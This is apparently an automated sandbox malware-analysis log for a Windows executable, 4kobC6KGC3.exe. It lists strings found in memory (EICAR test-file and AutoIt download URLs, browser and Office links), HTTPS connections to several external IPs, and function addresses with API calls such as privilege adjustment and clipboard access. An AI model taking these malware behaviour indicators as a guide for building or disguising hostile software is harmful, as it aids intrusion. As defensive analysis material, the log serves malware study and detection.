            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039240000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000382C0000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039240000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
            Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003812C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownHTTPS traffic detected: 142.251.32.110:443 -> 192.168.11.20:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.193:443 -> 192.168.11.20:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49768 version: TLS 1.2
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403359
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00404C680_2_00404C68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_0040698E0_2_0040698E
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_70471B5F0_2_70471B5F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00404C682_2_00404C68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_0040698E2_2_0040698E
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FC6002_2_075FC600
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F53702_2_075F5370
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FC3302_2_075FC330
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FC0602_2_075FC060
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F6FC82_2_075F6FC8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FCE702_2_075FCE70
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F9DE02_2_075F9DE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FBBC82_2_075FBBC8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FCBA02_2_075FCBA0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FE9882_2_075FE988
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FC8D02_2_075FC8D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F3E092_2_075F3E09
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FBD922_2_075FBD92
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F3AB12_2_075F3AB1
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FF95F2_2_075FF95F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075FE9782_2_075FE978
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F29EC2_2_075F29EC
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD72A902_2_3AD72A90
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD70B302_2_3AD70B30
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD718502_2_3AD71850
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD751482_2_3AD75148
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD796682_2_3AD79668
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD71FA82_2_3AD71FA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7CDF02_2_3AD7CDF0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7FA002_2_3AD7FA00
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD70B292_2_3AD70B29
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD718412_2_3AD71841
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD700402_2_3AD70040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD700062_2_3AD70006
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7F9F12_2_3AD7F9F1
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD751422_2_3AD75142
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD71F9F2_2_3AD71F9F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD78CC02_2_3AD78CC0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7EC182_2_3AD7EC18
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7EC072_2_3AD7EC07
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD79D382_2_3AD79D38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBA6E82_2_3AFBA6E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBAD402_2_3AFBAD40
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB22F12_2_3AFB22F1
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB08F02_2_3AFB08F0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB82F02_2_3AFB82F0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBE8F72_2_3AFBE8F7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB08E32_2_3AFB08E3
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB82E12_2_3AFB82E1
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBB6D82_2_3AFBB6D8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBA6D82_2_3AFBA6D8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB52C82_2_3AFB52C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBD6C82_2_3AFBD6C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBB6C72_2_3AFBB6C7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB52BB2_2_3AFB52BB
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB38B82_2_3AFB38B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBF6B82_2_3AFBF6B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBD6B72_2_3AFBD6B7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB1EA82_2_3AFB1EA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBF6A72_2_3AFBF6A7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB04982_2_3AFB0498
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB7E982_2_3AFB7E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB1E982_2_3AFB1E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBA2922_2_3AFBA292
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBA2902_2_3AFBA290
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB048B2_2_3AFB048B
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBC4882_2_3AFBC488
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB7E882_2_3AFB7E88
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBE4782_2_3AFBE478
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBC4782_2_3AFBC478
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB4E702_2_3AFB4E70
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBE4682_2_3AFBE468
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB4E6F2_2_3AFB4E6F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB34602_2_3AFB3460
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB1A502_2_3AFB1A50
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBB2482_2_3AFBB248
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB00402_2_3AFB0040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB7A402_2_3AFB7A40
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB9E3A2_2_3AFB9E3A
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB9E382_2_3AFB9E38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBD2382_2_3AFBD238
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBB2382_2_3AFBB238
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB7A302_2_3AFB7A30
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBAC362_2_3AFBAC36
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBD2292_2_3AFBD229
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB64282_2_3AFB6428
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBF2282_2_3AFBF228
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBF2192_2_3AFBF219
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB4A182_2_3AFB4A18
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB001E2_2_3AFB001E
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB30082_2_3AFB3008
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB4A082_2_3AFB4A08
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB15F82_2_3AFB15F8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB8FF82_2_3AFB8FF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBBFF82_2_3AFBBFF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB2FF82_2_3AFB2FF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB75E82_2_3AFB75E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBDFE82_2_3AFBDFE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB15E82_2_3AFB15E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB99E22_2_3AFB99E2
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB99E02_2_3AFB99E0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBBFE72_2_3AFBBFE7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBDFD82_2_3AFBDFD8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB5FD02_2_3AFB5FD0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB45C02_2_3AFB45C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB5FC02_2_3AFB5FC0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB45BF2_2_3AFB45BF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB2BB02_2_3AFB2BB0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBCDA82_2_3AFBCDA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB11A02_2_3AFB11A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB8BA02_2_3AFB8BA0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBED982_2_3AFBED98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBCD982_2_3AFBCD98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB71922_2_3AFB7192
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB8B912_2_3AFB8B91
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB71902_2_3AFB7190
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB11902_2_3AFB1190
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB95882_2_3AFB9588
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBED882_2_3AFBED88
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB5B782_2_3AFB5B78
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB95782_2_3AFB9578
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB5B6B2_2_3AFB5B6B
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB41682_2_3AFB4168
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBBB682_2_3AFBBB68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB415B2_2_3AFB415B
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB27582_2_3AFB2758
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBDB582_2_3AFBDB58
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBBB582_2_3AFBBB58
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB0D482_2_3AFB0D48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB87482_2_3AFB8748
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBFB482_2_3AFBFB48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBDB482_2_3AFBDB48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB0D382_2_3AFB0D38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB87382_2_3AFB8738
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBFB382_2_3AFBFB38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB57202_2_3AFB5720
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBC9182_2_3AFBC918
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB3D102_2_3AFB3D10
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB57102_2_3AFB5710
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBE9082_2_3AFBE908
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB3D0F2_2_3AFB3D0F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFB23002_2_3AFB2300
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFBC9072_2_3AFBC907
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD70C02_2_3AFD70C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFDD7102_2_3AFDD710
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD5AE02_2_3AFD5AE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD28E02_2_3AFD28E0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD3EC02_2_3AFD3EC0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD0CC02_2_3AFD0CC0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD94B82_2_3AFD94B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD3EB42_2_3AFD3EB4
